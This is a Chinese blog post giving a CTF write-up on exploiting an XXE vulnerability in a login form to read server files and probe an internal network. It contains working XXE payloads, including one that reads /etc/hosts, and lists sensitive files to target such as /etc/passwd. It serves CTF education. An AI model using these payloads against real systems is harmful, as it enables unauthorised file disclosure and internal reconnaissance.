XXE漏洞-内网探测

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

XXE漏洞-内网探测

XXE漏洞

XXE :Xml External Entity 外部实体注入攻击
是利用一种xml的语言进行的注入攻击
XXE漏洞原理就不详解了,一搜一大把

危害

  • 可以读取系统文件
  • 获取源代码
  • 进行SSRF
  • 进行Phar触发反序列化

CTF案例

本文主要是针对一个CTF题https://buuoj.cn/challenges#[NCTF2019]True%20XML%20cookbook
利用XXE漏洞进行SSRF攻击,探测内网主机
1.打开CTF题目
发现类似大佬的一个XXE-lab的题目
在这里插入图片描述
进行登录操作,用户名admin密码admin,抓包发现发送的是xml数据
那就尝试一下XXE攻击
在这里插入图片描述
2.尝试XXE攻击,线判断有没有回显点

<?xml version="1.0"?>
<!DOCTYPE a[
    <!ENTITY b "abc">
]>

<user><username>&b;</username><password>admin</password></user>

在这里插入图片描述
3.发现有回显点
开始构造代码,读取各种文件

外部引用可支持http,file等协议,
不同的语言支持的协议不同,但存在一些通用协议
php: file,http,ftp,php,compress.zlib,compress.bzip2,data,glob,phar
java: http,https,ftp,file,jar,netdoc,mailto,gopher
libxml2: file ,http,ftp
.net: file,http,https,ftp

这里可以利用file://,php://等伪协议进行获取文件
(获取代码最好使用php://filter进行base64转码)
在这里插入图片描述
先看看有flag文件没,发现并没有
就随意读取读取各种配置文件

/etc/hosts 储存域名解析的缓存
/etc/passwd 用户密码
/proc/net/arp 每个网络接口的arp表中dev包

最后在 /etc/hosts 发现内网地址

<?xml version="1.0"?>
<!DOCTYPE a[
    <!ENTITY b SYSTEM "file:///etc/hosts">
]>

<user><username>&b;</username><password>admin</password></user>

在这里插入图片描述
4.针对内网进行扫描
利用burp的爆破模块,快速扫描内网主机
在这里插入图片描述
最后在173.39.136.12成功找到flag
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值